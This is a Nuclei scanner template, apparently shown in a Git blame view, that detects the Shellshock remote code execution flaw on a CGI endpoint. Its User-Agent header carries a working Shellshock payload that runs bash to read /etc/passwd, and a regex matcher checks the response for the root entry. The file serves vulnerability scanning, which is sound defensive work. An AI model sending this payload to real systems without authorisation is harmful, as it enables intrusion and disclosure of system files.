nuclei-templates/vulnerabilities/rce-shellshock-user-agent.yaml

19 lines
359 B
YAML
Raw Normal View History

2020-05-28 15:20:00 +00:00
id: rce-user-agent-shell-shock
info:
name: Remote Code Execution Via (User-Agent)
author: 0xelkomy
severity: high
requests:
- method: GET
headers:
2020-08-06 08:03:58 +00:00
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
2020-05-28 15:20:00 +00:00
path:
- "{{BaseURL}}/cgi-bin/status"
matchers:
2020-06-03 00:08:36 +00:00
- type: regex
regex:
- "root:[x*]:0:0"
2020-05-28 15:20:00 +00:00
part: body